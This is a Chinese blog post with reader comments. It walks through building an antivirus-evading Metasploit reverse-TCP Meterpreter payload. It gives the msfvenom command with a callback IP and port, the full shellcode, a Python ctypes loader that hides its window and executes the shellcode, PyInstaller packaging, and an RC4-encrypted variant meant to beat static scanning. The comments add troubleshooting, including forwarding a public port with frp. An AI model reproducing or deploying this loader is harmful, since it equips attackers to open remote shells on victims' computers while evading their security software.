Metasploit生成免杀payload
无意中看到go 的远程dll 过杀软的,
然后就发现luan大佬的博客有一篇文章 python 的调用shellcode 的方式测试了一下
原文地址:http://lu4n.com/metasploit-payload-bypass-av-note/
└──╼ #msfvenom -p windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.1.15 -i 11 -f py -o msf.py [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 341 bytes Final size of py file: 1644 bytes Saved as: msf.py
shellCode 如下:
buf = "" buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff" buf += "\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80" buf += "\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x01\x0f\x68\x02" buf += "\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50" buf += "\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68" buf += "\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08" buf += "\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57" buf += "\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b" buf += "\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58" buf += "\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68" buf += "\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68" buf += "\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff" buf += "\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c" buf += "\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01" buf += "\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00" buf += "\x53\xff\xd5"
然后修改成如下:
from ctypes import * import ctypes buf = "" buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" buf += "\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66" buf += "\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0" buf += "\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f" buf += "\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68" buf += "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\x89\xe8\xff" buf += "\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80" buf += "\x6b\x00\xff\xd5\x6a\x0a\x68\xc0\xa8\x01\x0f\x68\x02" buf += "\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50" buf += "\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68" buf += "\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08" buf += "\x75\xec\xe8\x67\x00\x00\x00\x6a\x00\x6a\x04\x56\x57" buf += "\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b" buf += "\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58" buf += "\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68" buf += "\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68" buf += "\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff" buf += "\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c" buf += "\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01" buf += "\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00" buf += "\x53\xff\xd5" # libc = CDLL('libc.so.6') PROT_READ = 1 PROT_WRITE = 2 PROT_EXEC = 4 def executable_code(buffer): buf = c_char_p(buffer) size = len(buffer) addr = libc.valloc(size) addr = c_void_p(addr) if 0 == addr: raise Exception("Failed to allocate memory") memmove(addr, buf, size) if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC): raise Exception("Failed to set protection on buffer") return addr VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc VirtualProtect = ctypes.windll.kernel32.VirtualProtect shellcode = bytearray(buf) whnd = ctypes.windll.kernel32.GetConsoleWindow() if whnd != 0: if 666 == 666: ctypes.windll.user32.ShowWindow(whnd, 0) ctypes.windll.kernel32.CloseHandle(whnd) print ".................................." * 666 memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) old = ctypes.c_long(1) VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)), 0x40, ctypes.byref(old)) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell), buf, ctypes.c_int(len(shellcode))) shell = cast(memorywithshell, CFUNCTYPE(c_void_p)) print "Code By Luan" shell()
下载pywin32 解压运行,一直点下一步就可以了。
下载pyinstall 解压然后执行:(这里注意路径中不要带中文,Win10貌似需要管理员权限运行)
然后执行
python PyInstaller.py --console --onefile msf.py
360 扫描一下
电脑管家扫描一下:
点击运行一下
############8.24 更新
from ctypes import * import ctypes import sys, os, hashlib, time, base64 def rc4(string, op='encode', public_key='ddd', expirytime=0): ckey_lenth = 4 public_key = public_key and public_key or '' key = hashlib.md5(public_key).hexdigest() keya = hashlib.md5(key[0:16]).hexdigest() keyb = hashlib.md5(key[16:32]).hexdigest() keyc = ckey_lenth and (op == 'decode' and string[0:ckey_lenth] or hashlib.md5(str(time.time())).hexdigest()[32 - ckey_lenth:32]) or '' cryptkey = keya + hashlib.md5(keya + keyc).hexdigest() key_lenth = len(cryptkey) # 64 string = op == 'decode' and base64.b64decode(string[4:]) or '0000000000' + hashlib.md5(string + keyb).hexdigest()[0:16] + string string_lenth = len(string) result = '' box = list(range(256)) randkey = [] for i in xrange(255): randkey.append(ord(cryptkey[i % key_lenth])) for i in xrange(255): j = 0 j = (j + box[i] + randkey[i]) % 256 tmp = box[i] box[i] = box[j] box[j] = tmp for i in xrange(string_lenth): a = j = 0 a = (a + 1) % 256 j = (j + box[a]) % 256 tmp = box[a] box[a] = box[j] box[j] = tmp result += chr(ord(string[i]) ^ (box[(box[a] + box[j]) % 256])) if op == 'decode': if (result[0:10] == '0000000000' or int(result[0:10]) - int(time.time()) > 0) and result[10:26] == hashlib.md5( result[26:] + keyb).hexdigest()[0:16]: return result[26:] else: return None else: return keyc + base64.b64encode(result) buf = "" buf += "\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b" buf += "\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7" buf += "\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf" buf += "\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c" buf += "\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01" buf += "\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31" buf += "\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d" buf += "\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58" buf += "\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68" buf += "\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68" buf += "\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff" buf += "\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c" buf += "\x24\x0f\x85\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01" buf += "\xc3\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00" buf += "\x53\xff\xd5" buf=rc4(buf,'encode','6666666666666') # libc = CDLL('libc.so.6') PROT_READ = 1 PROT_WRITE = 2 PROT_EXEC = 4 def executable_code(buffer): buf = c_char_p(buffer) size = len(buffer) addr = libc.valloc(size) addr = c_void_p(addr) if 0 == addr: raise Exception("Failed to allocate memory") memmove(addr, buf, size) if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC): raise Exception("Failed to set protection on buffer") return addr VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc VirtualProtect = ctypes.windll.kernel32.VirtualProtect shellcode = bytearray(rc4(buf, 'decode', '6666666666666')) whnd = ctypes.windll.kernel32.GetConsoleWindow() if whnd != 0: if 666 == 666: ctypes.windll.user32.ShowWindow(whnd, 0) ctypes.windll.kernel32.CloseHandle(whnd) memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) old = ctypes.c_long(1) VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)), 0x40, ctypes.byref(old)) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell), buf, ctypes.c_int(len(shellcode))) shell = cast(memorywithshell, CFUNCTYPE(c_void_p)) shell()
编译之后上到里面去
http://r.virscan.org/language/en/report/ec14e943d1437b98c4d2c9d1c40c04e8
放到微步分析里面去
qwe
2019年7月30日 下午5:48
这是个大佬
ysg
2019年8月7日 下午4:05
win10 64 打开就应用停止怎么办
print("")
2019年8月22日 上午11:57
你是32位编译的么
Ender
2019年8月25日 下午8:50
不行啊大佬,运行后msf没有反应
print("")
2019年8月26日 上午9:18
你得frp 一下外网的一个端口。转发到你本地内网的msf里面去。我测试过了。本地内网IP是不行的。忘记说了
print("")
2019年8月26日 上午9:21
然后用rc4 的静态加密一下。 效果更佳
Ender
2019年8月25日 下午8:50
msf免杀
1111a
2019年9月17日 下午6:39
win10运行没反应哎
tty001
2020年1月15日 下午1:16
刚测试了一下,virustotal已经14报毒了,只要是pyinstaller打包的,就算没有恶意代码,都有很多报毒。。。。